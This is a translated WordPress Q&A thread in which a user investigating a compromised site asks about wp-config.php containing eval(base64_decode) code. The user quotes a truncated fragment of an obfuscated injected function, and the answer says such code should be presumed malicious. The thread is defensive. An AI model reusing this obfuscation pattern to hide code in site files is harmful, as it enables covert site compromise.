Concerns over wp-config file

时间:2016-12-20 作者:LewisJWright

我的任务是调查一个被报道为滥用的网站,我之前没有这个网站的经验,也不知道为什么或者如何设置,在我的调查中,我发现了多个wp admin文件夹,文件夹的末尾有数字,还有一个wp配置文件,其中包含很多我认为不应该存在的代码。

许多对base64代码进行解码的eval()函数,解码后包含全局定义的变量,如:

 if (!defined(\'ALREADY_RUN_1bc29b36f342a82aaf6658785356718\'))
    {
    define(\'ALREADY_RUN_1bc29b36f342a82aaf6658785356718\', 1);

     $ccexjwtgo = 413; function zscvdwpfe($bmbauwl, $uhkkg){$kirmhhq = \'\'; for($i=0; $i < strlen($bmbauwl); $i++){$kirmhhq .= isset($uhkkg[$bmbauwl[$i]])
我已将wordpress安装更新为4.7,更新了所有插件,并删除了我认为有问题或不必要的插件。我可以安全地假设这个网站确实被破坏了吗?或者这只是从插件导入的一些奇怪的东西还是什么?

1 个回复
最合适的回答,由SO网友:Rarst 整理而成

WordPress核心不包含模糊代码(除了修订版复活节彩蛋)。

虽然wp-config.php 可以(而且经常)包含任意代码,扩展在其中添加任何内容都是不正常的,而且没有API方法。简而言之,为了特定的配置目的,它需要手动编辑。

我会假设在这种情况下,任何模糊的代码都是有害的,并且会破坏网站。

标签: wp-config   小码农  

相关推荐

将SMTP密码存储在wp-config.php中是否安全?

我使用SMTP通过WordPress发送电子邮件,但这需要使用纯文本密码。如果此密码存储在wp-config.php?非常similar to this.为什么此主题与链接主题不同:密码的性质。此密码可用于垃圾邮件群发,可能需要额外的保护步骤和注意事项。